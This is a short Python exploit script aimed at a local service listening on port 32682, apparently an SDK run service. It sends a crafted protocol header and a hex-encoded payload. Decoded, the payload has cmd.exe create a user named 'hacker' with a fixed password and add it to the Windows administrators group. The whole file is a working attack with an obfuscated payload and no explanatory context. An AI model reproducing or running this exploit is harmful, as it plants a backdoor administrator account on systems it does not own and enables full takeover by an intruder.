import socket HOST = "127.0.0.1" PORT = 32682 #SDK RUN s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) intro = b'\x0f\x27\x00\x00' cmd = bytearray() cmd.append(5) cmd.append(3) cmd.append(1) cmd.append(8) cmd.append(255) cmd.append(255) cmd.append(255) cmd.append(252) ### Malicious payload: hax = b'\x43\x3a\x5c\x5c\x57\x69\x6e\x64\x6f\x77\x73\x5c\x5c\x53\x79\x73\x74\x65\x6d\x33\x32\x5c\x5c\x63\x6d\x64\x2e\x65\x78\x65\x2c\x2f\x63\x20\x22\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x2f\x61\x64\x64\x20\x68\x61\x63\x6b\x65\x72\x20\x68\x61\x63\x6b\x65\x72\x31\x32\x33\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x65\x72\x20\x2f\x61\x64\x64\x20\x3e\x3e\x20\x43\x3a\x5c\x5c\x55\x73\x65\x72\x73\x5c\x5c\x50\x75\x62\x6c\x69\x63\x5c\x5c\x77\x68\x6f\x61\x6d\x69\x2e\x74\x78\x74\x22' print("Payload sent!") s.send(intro + cmd + hax) print(s.recv(2048)) s.close()